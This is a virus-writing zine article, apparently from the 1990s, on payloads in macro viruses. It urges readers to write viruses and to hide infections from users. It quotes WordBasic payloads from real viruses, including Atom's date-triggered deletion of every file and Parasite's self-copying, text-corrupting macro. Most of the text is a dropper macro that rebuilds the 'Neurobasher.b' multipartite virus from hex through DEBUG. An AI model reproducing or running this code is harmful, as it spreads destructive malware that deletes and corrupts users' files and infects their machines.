SLAM.003: Payloads in macro virii
PAYLOADS IN MACRO VIRII
This file is about payloads. Payloads are things a virus does on a special time.
It's best if you not activate the payload on the first infection because the user then knows that he has a virus. Many virii look for the date and time to deliver the payload, or they can watch how many files they already infected on that computer.
For example:
A virus gets into your computer and you don't notice it. When the virus infected the 100th file the virus delivers the payload, your (precious) hard disk is overwritten.
This was just an example of a payload, if you gonna write a virus, be original!
But we're going to talk about payloads in macro virii so lets start. A macro virus will most of the time look at the date for delivering the payload. We'll give a couple examples of payloads in existing macro virii.
The payload in the Atom macro virii
-----------------------------------------------
Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
Kill "*.*"
End If
KillError:
End Sub
------------------------------------------------
As you can see it will check if the day is the 13th of the month 12 (December), and if it's the 12th of December it will delete (kill) *.*.
An other example of a payload is the following:
'Payload macro from the concept virus
---------------------------------------------
Sub MAIN
REM That's enough to prove my point
End Sub
---------------------------------------------
This one does no harm and only contains a text string. The name of the macro is payload and concept checks for this macro to see if he is already installed (infected).
Down here, again another payload, this time from the Wazzu virus:
---------------------------
If Rnd() < 0.25 Then
RndWord
Insert "wazzu "
StartOfDocument
End If
----------------------------
The above piece of a macro generates a random number, and if the number is lower then 0.25 it will put the word Wazzu at the begin of the document.
The next one is from the Parasite 1.0 macro virus:
----------------------------------------------------------------
Sub MAIN
n = Day(Now())
If n = 16 Then Goto y
If n < 16 Then Goto n
If n > 16 Then Goto n
y:
EditReplace .Find = ".", .Replace = ",", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
EditReplace .Find = "a", .Replace = "e", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
n:
EditReplace .Find = "and", .Replace = "not", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
sMe$ = FileName$()
FileSaveAs .Name = sMe$, .Format = 1
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:PARA", sTMacro$, 4
sTMacro$ = sMe$ + ":PARA"
MacroCopy "Global:PARA", sTMacro$, 4
sTMacro$ = sMe$ + ":SITE"
MacroCopy "Global:SITE", sTMacro$, 3
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$, 1
sTMacro$ = sMe$ + ":K"
MacroCopy "Global:AutoExec", sTMacro$, 5
sTMacro$ = sMe$ + ":a678"
MacroCopy "Global:AutoOpen", sTMacro$, 6
sTMacro$ = sMe$ + ":I8U9Y13"
MacroCopy "Global:AutoExit", sTMacro$, 7
FileSaveAs .Name = sMe$, .Format = 1
End Sub
----------------------------------------------------------------
This is the whole FileSaveAs macro from Parasite 1.0 it first looks for the date, and checks if the day is 16. And if it is the 16th the virus will change all "." to "," and all "a" to "e" and all "and" to "not". The last thing (and --> not) the virus does with every save of a document. (I personally like this one ;)
And finally I'll show you, what I call, the debug payloads. Look at the following example. If you know debug the following will be familiar.
----------------------------------------------------------------
On Error Goto NoDropper 'setup an error handler
Open "c:\dos\debug.exe" For Input As #1
Close #1
'The list of numbers is the hex code of the
'"Neurobasher.b" multipartite virus.
Open "c:\dos\script.scr" For Output As #1
Print #1, "N debugger.exe" 'uses debug to create file "debugger.exe"
Print #1, "E 0100 4D 5A EC 00 0C 00 00 00 20 00 00 00 FF FF 00 00"
Print #1, "E 0110 00 00 32 2D 00 00 01 00 1E 00 00 00 01 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0300 B8 00 4C CD 21 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0310 E9 3D 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0350 FC 2B FF B4 F2 CD 13 72 47 B4 62 CD 21 8E C3 2B"
Print #1, "E 0360 FF 53 4B 8E DB BB FF FF 80 FF 50 77 0C A1 03 00"
Print #1, "E 0370 2B C3 29 45 12 B4 4A CD 21 5B 8E DB 83 C3 10 FA"
Print #1, "E 0380 BC 00 00 8D 87 00 00 8E D0 81 C3 00 00 FB 9C 53"
Print #1, "E 0390 68 00 00 2B DB 33 C9 8B D1 33 F6 8B EE 33 C0 CF"
Print #1, "E 03A0 E8 00 00 5E B9 00 12 81 EE 93 00 0E 1F 68 00 7C"
Print #1, "E 03B0 07 06 68 A8 00 F3 A4 CB 6A 49 B4 52 CD 21 BB 84"
Print #1, "E 03C0 00 8E D9 2E 8C 06 E0 01 B8 AF 01 87 47 80 50 8C"
Print #1, "E 03D0 C8 87 47 82 50 9C 58 80 CC 01 50 9D B4 4D 9C FF"
Print #1, "E 03E0 1F 2E A1 8F 14 2E A3 93 14 2E A1 91 14 2E A3 95"
Print #1, "E 03F0 14 2E C7 06 E0 01 00 F0 B4 00 99 9C FF 5F C8 8F"
Print #1, "E 0400 47 82 8F 47 80 E8 81 01 C7 45 EC 98 05 C7 45 FC"
Print #1, "E 0410 C3 02 B8 F0 04 8B D0 B7 13 93 CD 2F 2E C5 3E 93"
Print #1, "E 0420 14 E8 F7 02 60 0E 1F 0E 07 80 FA 80 74 17 B4 04"
Print #1, "E 0430 CD 1A 8A C6 04 03 27 3C 12 76 03 2C 12 41 A2 70"
Print #1, "E 0440 02 88 0E 69 02 B8 01 02 BB 8F 12 B9 01 00 BA 80"
Print #1, "E 0450 00 E8 A9 0A 80 7F 09 8E 74 63 B1 04 8D B7 AE 01"
Print #1, "E 0460 83 C6 10 38 14 E0 F9 E3 54 8A 44 04 3C 01 74 08"
Print #1, "E 0470 3C 04 72 49 3C 06 77 45 8B 44 08 3C 11 72 3E E8"
Print #1, "E 0480 A1 0A B1 07 E8 73 0A 41 89 0E 0C 02 89 16 0F 02"
Print #1, "E 0490 53 33 DB B8 09 03 E8 64 0A 5B BE F8 01 8B FB B1"
Print #1, "E 04A0 1E F3 A4 B0 02 B9 E0 01 F3 AA B1 01 E8 4B 0A B8"
Print #1, "E 04B0 01 02 B6 01 E8 46 0A E8 69 0A E8 3D 0A 61 C3 60"
Print #1, "E 04C0 1E 8B EC C5 76 12 E8 9B 09 3D CC CF 74 26 3D 63"
Print #1, "E 04D0 80 75 1A 81 7C 04 72 11 75 13 81 7C 0E E4 CF 74"
Print #1, "E 04E0 13 3D 2E FF 75 07 81 7C 09 FA 9A 74 07 8C D8 3D"
Print #1, "E 04F0 00 F0 75 11 8C D8 2E A3 91 14 8B 46 12 2E A3 8F"
Print #1, "E 0500 14 80 66 17 FE 1F 61 CF FA 33 C0 8E D0 BC 00 7C"
Print #1, "E 0510 FB 8E C4 06 68 16 02 93 B8 09 02 B9 08 00 BA 80"
Print #1, "E 0520 00 CD 13 72 FE CB FC E8 5F 00 06 0E 07 B8 F0 04"
Print #1, "E 0530 BE 84 00 BF 8F 14 87 44 C8 AB 33 C0 87 44 CA AB"
Print #1, "E 0540 A5 A5 07 B8 01 02 8B DC 49 CD 13 0A D2 74 03 E8"
Print #1, "E 0550 D1 09 06 53 B1 FF 43 81 3F C2 73 75 04 C6 47 01"
Print #1, "E 0560 EB 81 3F A7 75 75 03 88 67 02 E2 EA E8 B5 FE 40"
Print #1, "E 0570 A3 44 0C B4 04 CD 1A 80 F9 90 77 07 72 0A 80 FE"
Print #1, "E 0580 04 72 05 C6 06 41 0C 90 CB 2E C6 06 41 0C C3 33"
Print #1, "E 0590 C0 8E D8 8E C0 2E A2 99 05 2E A3 B4 04 BF F0 04"
Print #1, "E 05A0 B0 EA AA 88 45 EF B8 A6 02 AB C7 45 EE B3 04 8C"
Print #1, "E 05B0 C8 AB 89 45 EE C3 60 1E 06 6A 00 1F 80 3E 87 00"
Print #1, "E 05C0 08 77 0D C7 06 F1 04 C3 02 C5 3E 84 00 E8 4B 01"
Print #1, "E 05D0 07 1F 61 E8 7B 09 2E FF 06 A1 0E 81 FC 00 13 72"
Print #1, "E 05E0 0B 81 FC 00 16 77 05 80 FC F2 74 69 80 FC 02 74"
Print #1, "E 05F0 05 80 FC 03 75 41 83 FA 02 72 5D 80 FA 80 75 37"
Print #1, "E 0600 83 F9 01 75 37 80 FE 01 77 2D 51 FE C8 74 0C 50"
Print #1, "E 0610 53 80 C7 02 41 E8 E5 08 49 5B 58 B0 01 80 FA 01"
Print #1, "E 0620 77 08 B9 01 50 E8 D5 08 EB 09 0A F6 75 02 B1 07"
Print #1, "E 0630 E8 EA 08 59 CA 02 00 2E FF 2E 8F 14 0A F6 75 F7"
Print #1, "E 0640 50 8C C8 80 FC 7C 58 74 EE 83 F9 11 77 E9 80 F9"
Print #1, "E 0650 06 72 E4 B4 00 F8 EB DC 83 F9 01 75 DA 50 E8 9C"
Print #1, "E 0660 08 73 05 44 44 F9 EB EE 58 26 80 BF FD 01 F2 74"
Print #1, "E 0670 99 60 1E 06 06 1F 0E 07 8B F3 BF 8F 12 B9 00 01"
Print #1, "E 0680 2E 38 0E 99 05 75 18 F3 A5 80 3F EB 75 11 8B 47"
Print #1, "E 0690 13 BF F4 11 3D 40 0B 74 08 BF E9 11 3D 60 09 75"
Print #1, "E 06A0 74 0E 1F B8 1E 35 CD 21 53 06 B4 25 50 52 8B D7"
Print #1, "E 06B0 CD 21 5A 0E 07 BD 50 00 B1 0A BF 67 12 8B DF 8B"
Print #1, "E 06C0 C5 AB 8A C1 F6 D8 04 0B B4 02 AB E2 F2 B8 0A 05"
Print #1, "E 06D0 B9 01 50 E8 27 08 72 38 BB 8F 12 E8 1C 08 72 30"
Print #1, "E 06E0 41 B8 09 03 33 DB E8 14 08 72 25 89 0E 0C 02 89"
Print #1, "E 06F0 1E 0F 02 93 BB 8F 12 8A 47 01 97 8D 79 02 BE F8"
Print #1, "E 0700 01 B9 1E 00 F3 A4 C6 87 FD 01 F2 B1 01 E8 EA 07"
Print #1, "E 0710 58 1F 5A CD 21 07 1F 61 E9 38 FF B4 30 CD 21 3C"
Print #1, "E 0720 05 72 09 B4 52 CD 21 06 1F BF 9E 10 B9 01 00 2E"
Print #1, "E 0730 89 3E 93 14 2E 8C 1E 95 14 8B 05 3C 90 74 05 3D"
Print #1, "E 0740 03 EB 75 07 8B 7D 08 C4 3D EB 12 3D 2E 3A 75 05"
Print #1, "E 0750 41 1E 07 EB 08 3C EA 75 13 C4 7D 01 49 B0 9A FC"
Print #1, "E 0760 AA B8 E0 04 AB 33 C0 AB B0 90 F3 AA C3 B8 00 43"
Print #1, "E 0770 CD 2F 3C 80 75 1E B8 10 43 CD 2F 2E 89 1E 97 14"
Print #1, "E 0780 2E 8C 06 99 14 B4 10 8B D7 2E FF 1E 97 14 48 75"
Print #1, "E 0790 03 8B EB C3 B8 00 58 CD 21 50 B8 01 58 50 BB 80"
Print #1, "E 07A0 00 CD 21 B8 02 58 CD 21 B4 00 50 B8 03 58 50 B3"
Print #1, "E 07B0 01 CD 21 B4 48 8B DF CD 21 95 58 5B CD 21 58 5B"
Print #1, "E 07C0 CD 21 C3 E9 D6 00 2E C6 06 B4 04 D5 60 E8 74 06"
Print #1, "E 07D0 8B DA B9 80 00 80 FF FF 74 32 80 7F 01 3A 75 2C"
Print #1, "E 07E0 80 3F 2E 75 24 81 7F FE 4F 50 74 0E 81 7F FE 54"
Print #1, "E 07F0 41 74 07 81 7F FB 51 43 75 0F FE 07 B8 20 09 33"
Print #1, "E 0800 DB B1 F0 CD 10 93 E9 8D 00 43 E2 D4 1E 06 B4 52"
Print #1, "E 0810 CD 21 26 8E 5F FE BE 10 00 80 7C F4 80 B0 00 77"
Print #1, "E 0820 73 BF 4E 01 E8 46 FF 8B D5 80 FE A0 72 0C 4D 8E"
Print #1, "E 0830 DD 8B C7 C7 44 F1 08 00 EB 35 1E 80 3C 46 74 05"
Print #1, "E 0840 80 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B"
Print #1, "E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B"
Print #1, "E 0860 44 F1 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E"
Print #1, "E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04"
Print #1, "E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04"
Print #1, "E 0890 8C 06 F3 04 07 1F 2E A2 B4 04 61 CB 1E 68 01 C8"
Print #1, "E 08A0 1F C7 06 03 00 4E 01 1F EB 68 2E 8C 1E F7 05 0E"
Print #1, "E 08B0 1F 89 1E E2 05 BB E2 05 89 47 06 89 4F 0C 89 57"
Print #1, "E 08C0 12 89 77 09 89 7F 0F 89 6F 03 8C 47 19 C6 47 B7"
Print #1, "E 08D0 68 FF 06 A3 0E FC E8 78 06 8A C4 1E B9 0E 00 07"
Print #1, "E 08E0 BF 1A 06 F2 AE 75 28 D1 E1 03 D9 68 FF 05 FF 77"
Print #1, "E 08F0 46 BB 00 00 BD 00 00 B8 00 00 BE 00 00 B9 00 00"
Print #1, "E 0900 BF 00 00 BA 00 00 68 00 00 1F 68 00 00 07 C3 E8"
Print #1, "E 0910 0E 00 80 FC 6C 77 01 CB 83 C4 04 32 C0 CA 02 00"
Print #1, "E 0920 E8 CE FF 2E C6 06 99 05 00 C3 4B 4C 11 12 4E 4F"
Print #1, "E 0930 42 3F 3E 3D 32 44 25 40 C3 0B 39 0B 29 0B 2D 0B"
Print #1, "E 0940 68 06 1B 0B B5 0A 84 0A 67 09 49 09 B9 09 B9 09"
Print #1, "E 0950 1B 0B 4F 06 20 43 4F 20 00 2F 44 3A 46 20 00 3C"
Print #1, "E 0960 00 74 15 3C 01 75 10 B8 02 3D E8 A8 05 72 08 93"
Print #1, "E 0970 E8 60 05 B4 3E CD 21 C3 E8 B0 04 50 8B F2 BF 9B"
Print #1, "E 0980 14 0E 07 AC AA 0A C0 75 FA 0E 1F 59 80 FD 3D 75"
Print #1, "E 0990 2A C3 81 7D F3 53 4D 75 07 81 7D F9 48 4B 74 0E"
Print #1, "E 09A0 81 7D F4 43 48 75 D0 81 7D F6 4B 4C 75 C9 E8 6F"
Print #1, "E 09B0 FF 83 C4 06 B8 02 00 F9 CA 02 00 80 FD 4B 75 11"
Print #1, "E 09C0 C6 06 81 06 C3 81 7D F9 41 56 75 05 C6 06 81 06"
Print #1, "E 09D0 90 BE 49 06 81 7D F8 57 49 75 06 80 7D FA 4E 74"
Print #1, "E 09E0 11 BE 44 06 81 7D F6 42 53 75 39 81 7D F9 41 4E"
Print #1, "E 09F0 75 32 BF 8F 12 8B DF C6 05 FF 47 AC 0A C0 74 05"
Print #1, "E 0A00 AA FE 07 EB F6 8B 36 E2 05 8E 1E FB 05 8C C8 87"
Print #1, "E 0A10 44 04 50 8B C3 87 44 02 96 1F 46 AC AA 2E FF 07"
Print #1, "E 0A20 3C 0D 75 F7 0E 1F C6 06 B9 09 90 B4 2F CD 21 53"
Print #1, "E 0A30 06 B4 1A BA 04 12 CD 21 B8 24 35 CD 21 53 06 B4"
Print #1, "E 0A40 25 50 BA 8D 00 CD 21 B3 00 E8 3B 00 B4 4E B9 27"
Print #1, "E 0A50 00 E8 DF 00 72 24 BE 00 12 33 FF 80 7C 04 02 77"
Print #1, "E 0A60 16 52 B5 04 BA F5 03 B0 04 EE E2 FE B5 04 EE E2"
Print #1, "E 0A70 FE EC A8 40 5A 75 03 E8 1D 00 58 1F 5A CD 21 B4"
Print #1, "E 0A80 1A 1F 5A CD 21 B3 00 60 B8 02 FA BA 45 59 CD 16"
Print #1, "E 0A90 2E 88 0E 76 07 61 C3 39 7C 20 75 07 81 7C 1E 11"
Print #1, "E 0AA0 27 72 F3 B4 2A CD 21 8B 44 1C D1 E8 80 E9 BC 3A"
Print #1, "E 0AB0 E1 75 09 C1 E8 04 24 0F 3A C6 74 DA 8A 44 19 24"
Print #1, "E 0AC0 07 74 08 B8 01 43 33 C9 E8 68 00 B8 02 3D E8 62"
Print #1, "E 0AD0 00 72 53 93 B8 00 57 CD 21 51 52 B4 3F E8 68 01"
Print #1, "E 0AE0 72 38 80 7C 18 40 74 32 8B 04 02 C4 3C A7 75 2A"
Print #1, "E 0AF0 8B 44 04 48 33 D2 BD 00 02 F7 E5 03 44 02 13 D7"
Print #1, "E 0B00 39 44 1E 75 15 39 54 20 75 10 B0 02 E8 43 01 E8"
Print #1, "E 0B10 23 02 74 06 E8 14 03 E8 20 00 B8 01 57 5A 59 E8"
Print #1, "E 0B20 F3 03 B4 3E CD 21 B8 01 43 33 C9 8A 4C 19 80 F9"
Print #1, "E 0B30 20 74 06 BA 9B 14 E9 DC 03 C3 8B 44 0E A3 75 00"
Print #1, "E 0B40 8B 44 10 A3 71 00 8B 44 14 A3 81 00 8B 44 16 A3"
Print #1, "E 0B50 7B 00 8B 44 0C 80 FC FF 74 12 8B 44 04 99 B9 20"
Print #1, "E 0B60 00 F7 E1 2B 44 08 03 44 0C 05 10 00 A3 56 00 B4"
Print #1, "E 0B70 00 CD 1A 52 92 B4 F2 2A E0 F7 D8 89 44 22 58 8A"
Print #1, "E 0B80 CC 25 1F 00 C1 E0 04 A3 FE 08 8B 54 1E 83 E2 0F"
Print #1, "E 0B90 03 C2 A3 AD 0E 80 E1 1F 89 0E 0B 09 8B 44 1E 05"
Print #1, "E 0BA0 24 12 8B D0 0C 1F 2B C2 A3 E6 08 50 68 00 BE 07"
Print #1, "E 0BB0 33 FF 26 81 3D 20 07 74 02 58 C3 E8 0C 04 B4 40"
Print #1, "E 0BC0 B9 00 12 E8 90 00 3B C1 59 C7 05 20 07 0E 1F 75"
Print #1, "E 0BD0 E9 B6 13 E8 3D 03 B9 24 00 BA 00 12 E8 5F 03 E8"
Print #1, "E 0BE0 31 03 E8 59 03 E8 68 00 8B 44 1E 8B 54 20 50 52"
Print #1, "E 0BF0 05 24 12 13 D7 05 17 00 13 D7 F7 F5 40 89 44 04"
Print #1, "E 0C00 89 54 02 5A 58 F7 36 5A 08 2B 44 08 50 B9 60 00"
Print #1, "E 0C10 C1 E9 04 2B C1 89 44 16 58 48 05 04 00 89 44 0E"
Print #1, "E 0C20 03 16 FE 08 89 54 14 B8 00 16 8B 16 0B 09 C1 E2"
Print #1, "E 0C30 04 2B C2 89 44 10 81 44 0A 61 01 8B 44 0A 39 44"
Print #1, "E 0C40 0C 77 03 89 44 0C B4 40 B9 19 00 8B D6 E9 C5 02"
Print #1, "E 0C50 B0 00 B4 42 33 C9 99 EB F4 FC 0E 07 8B F2 BF 9B"
Print #1, "E 0C60 14 8B CF AC AA 3C 5C 75 02 8B CF 0A C0 75 F4 2E"
Print #1, "E 0C70 89 0E 79 09 E8 7A FC 83 C4 06 CD 21 72 43 50 E8"
Print #1, "E 0C80 83 00 72 3B 1E 8D 77 1E BF 9B 14 BA 9B 14 B9 0D"
Print #1, "E 0C90 00 0E 07 F3 A4 07 0E 1F 8B F3 B8 00 3D E8 75 02"
Print #1, "E 0CA0 72 1D 93 E8 85 01 E8 8C 00 9C B4 3E CD 21 9D 75"
Print #1, "E 0CB0 0E A1 61 12 26 89 44 1A A1 63 12 26 89 44 1C 58"
Print #1, "E 0CC0 F8 50 E8 5B FC 58 CA 02 00 90 83 C4 06 CD 21 3C"
Print #1, "E 0CD0 00 75 EE 50 E8 2E 00 72 E6 0E 07 8D 77 FE BF 43"
Print #1, "E 0CE0 12 8B D7 FC B9 08 00 E8 12 00 B0 2E AA 8D 77 06"
Print #1, "E 0CF0 B1 03 E8 07 00 B0 00 AA 1E 07 EB 9E AC 3C 20 74"
Print #1, "E 0D00 03 AA E2 F8 C3 B4 2F CD 21 06 1F 80 3F FF 75 03"
Print #1, "E 0D10 83 C3 07 2E 80 3E E9 05 12 77 03 83 C3 03 8A 47"
Print #1, "E 0D20 1A 24 1F 3C 1F 74 02 F9 C3 83 7F 1C 00 75 05 81"
Print #1, "E 0D30 7F 1A 11 27 C3 B8 00 44 CD 21 A8 80 75 55 0E 1F"
Print #1, "E 0D40 B0 01 E8 0D FF 72 4C A3 63 0A 89 16 66 0A 80 FB"
Print #1, "E 0D50 00 74 27 B8 02 42 B9 FF FF BA DC FF CD 21 88 1E"
Print #1, "E 0D60 40 0A B4 3F B9 24 00 BA 43 12 CD 21 E8 CF 01 B8"
Print #1, "E 0D70 00 42 BA 00 00 B9 00 00 CD 21 80 3E 43 12 5A 74"
Print #1, "E 0D80 07 80 3E 43 12 4D 75 0B 50 A1 65 12 F7 D8 02 C4"
Print #1, "E 0D90 3C F2 58 C3 3C 02 75 FB E8 9A FF 75 F6 83 C4 06"
Print #1, "E 0DA0 E8 4E FB 51 B0 00 2E 8B 0E 63 12 2E 8B 16 61 12"
Print #1, "E 0DB0 2E 03 16 F4 05 83 D1 00 2E 03 0E EE 05 CD 21 E8"
Print #1, "E 0DC0 61 FB 59 EB 63 51 E8 6C FF 5D 75 C7 83 C4 06 BE"
Print #1, "E 0DD0 43 12 2B 44 1E 83 DA 00 2B 54 20 78 08 E8 40 FB"
Print #1, "E 0DE0 2B C0 F8 EB 43 03 C5 83 D2 00 75 02 2B E8 55 E8"
Print #1, "E 0DF0 FF FA 59 CD 21 9C 50 72 2A 1E 07 8B FA 0E 1F BE"
Print #1, "E 0E00 43 12 83 3E 66 0A 00 75 1A A1 63 0A 3D 18 00 73"
Print #1, "E 0E10 12 03 F0 03 C8 83 F9 18 76 06 2D 18 00 F7 D8 91"
Print #1, "E 0E20 FC F3 A4 E8 FA FA 58 9D CA 02 00 2E C6 06 40 0A"
Print #1, "E 0E30 00 2E C7 06 65 12 00 00 C3 3C 52 75 06 2E C6 06"
Print #1, "E 0E40 B9 09 C3 C3 80 FC 25 75 78 8B F2 81 3C CD 30 75"
Print #1, "E 0E50 13 2E C5 16 8F 14 1E 07 8B C2 B7 13 93 CD 2F A1"
Print #1, "E 0E60 FF FF EB FE 8B 04 3C EB 75 11 81 7C 07 FA 9C 75"
Print #1, "E 0E70 0A 81 7C 09 FC 53 75 03 C6 04 A8 3D FA 9C 75 0B"
Print #1, "E 0E80 81 7C 04 F6 06 75 04 C6 44 09 EB 3D 2E 83 75 13"
Print #1, "E 0E90 81 7C 09 50 55 75 0C 80 BC 6E 01 E8 75 05 C6 84"
Print #1, "E 0EA0 6E 01 C3 3D CD 30 75 02 EB FE 3D FB 2E 75 13 81"
Print #1, "E 0EB0 7C 07 75 03 75 0B 81 7C 0D FC FA 75 04 C6 44 08"
Print #1, "E 0EC0 00 C3 3D 9C EB 75 FA 81 7C 02 00 80 75 F3 C6 44"
Print #1, "E 0ED0 07 00 C3 E8 5F FE 75 E9 E8 75 FD BE 43 12 E8 65"
Print #1, "E 0EE0 FD 72 14 B8 00 42 8B 0E 63 12 8B 16 61 12 CD 21"
Print #1, "E 0EF0 B4 40 33 C9 E8 1E 00 E9 75 FE B8 01 03 53 33 DB"
Print #1, "E 0F00 E8 84 FB 5B FA 9C 2E FF 1E 8F 14 53 9C E8 75 FB"
Print #1, "E 0F10 9D 5B C3 B4 40 FA 9C 2E FF 1E 93 14 C3 E8 03 00"
Print #1, "E 0F20 E8 DA FF 60 8B F3 8B FB 8A CE BA AD DE D3 E2 B9"
Print #1, "E 0F30 FF 00 26 AD 33 C2 83 C2 7F AB E2 F6 61 C3 60 8B"
Print #1, "E 0F40 F2 8A 5C 23 49 AC 32 C3 02 D9 88 44 FF E2 F6 61"
Print #1, "E 0F50 C3 C3 60 B9 01 00 E2 FE 2E FE 06 44 0C 75 1E B8"
Print #1, "E 0F60 03 00 CD 10 B4 02 B7 00 BA 03 0C CD 10 BE 6F 0C"
Print #1, "E 0F70 2E AC 34 F5 CD 29 0A C0 75 F6 98 CD 16 61 C3 C9"
Print #1, "E 0F80 BD B4 A3 BA B6 CB D5 97 8C D5 BB 90 80 87 9A 97"
Print #1, "E 0F90 94 86 9D 90 87 D2 CC C6 DA B2 90 87 98 94 9B 8C"
Print #1, "E 0FA0 D5 31 B2 A7 BC A5 A5 B0 B1 31 B7 AC 31 B3 B0 B4"
Print #1, "E 0FB0 A7 31 A0 BB A1 BC B9 31 B1 B0 B4 A1 BD 31 A0 A6"
Print #1, "E 0FC0 31 B1 BA 31 A5 B4 A7 A1 31 F5 60 33 F6 B9 DC 14"
Print #1, "E 0FD0 F3 A4 BE 9A 0E 2B FF 33 C0 A3 2E 0E C6 06 37 0E"
Print #1, "E 0FE0 35 A3 38 0E C7 44 99 90 90 C6 44 98 05 B4 2C CD"
Print #1, "E 0FF0 21 89 4C 03 89 54 05 B4 2A CD 21 89 0C 88 44 02"
Print #1, "E 1000 52 B4 00 CD 1A 87 E9 59 87 F3 FC 8B C1 03 C2 33"
Print #1, "E 1010 C5 89 47 59 8B C2 0B C5 D1 C0 F7 D8 89 47 6F 89"
Print #1, "E 1020 47 94 68 9B 11 68 63 11 B8 42 11 FF D0 58 FF D0"
Print #1, "E 1030 58 FF D0 A1 13 0D 87 06 16 0D 87 06 19 0D F6 C1"
Print #1, "E 1040 01 74 04 87 06 16 0D A3 13 0D B0 0F E8 81 03 89"
Print #1, "E 1050 7F 0B 8B F1 83 E6 07 D1 E6 83 FE 06 72 11 83 FE"
Print #1, "E 1060 08 77 0C B0 F8 F6 C5 02 74 01 40 AA 88 47 96 F6"
Print #1, "E 1070 47 09 03 75 03 B0 2E AA F6 47 03 03 75 0B 83 C6"
Print #1, "E 1080 10 83 FE 18 77 03 B0 81 AA FF 50 A8 B8 AF 11 BE"
Print #1, "E 1090 C0 11 F6 C2 01 75 01 96 56 FF D0 58 FF D0 B0 0F"
Print #1, "E 10A0 E8 2D 03 8B 77 07 83 E6 03 D1 E6 FF 50 D8 E8 1D"
Print #1, "E 10B0 03 8A 47 05 25 03 00 96 81 C6 8A 0E A4 89 7F 0D"
Print #1, "E 10C0 AA E8 0A 03 83 FD 13 72 0F F6 47 03 03 75 09 B8"
Print #1, "E 10D0 33 C9 AB B0 E3 AA EB 0B 8B 77 06 83 E6 03 81 C6"
Print #1, "E 10E0 8E 0E A4 8B 47 0B 2B C7 48 26 80 7D FF E9 74 03"
Print #1, "E 10F0 AA EB 02 48 AB 57 B0 68 AA 8B 47 13 05 40 00 AB"
Print #1, "E 1100 B0 C3 AA 5F 8B 47 0D 8B F0 F7 D8 03 C7 48 26 88"
Print #1, "E 1110 04 B8 42 12 8B 77 11 2B C7 03 47 13 26 89 04 8B"
Print #1, "E 1120 77 0F 8B C7 03 47 13 B9 05 00 06 1F 80 3C FE 75"
Print #1, "E 1130 02 88 04 80 3C FF 75 02 88 24 46 E2 EF B8 82 76"
Print #1, "E 1140 F8 29 05 90 90 47 47 35 00 00 81 FF 01 12 72 F0"
Print #1, "E 1150 61 C3 69 0F 7C 0F 86 0F 8A 0F 94 0F 98 0F A3 0F"
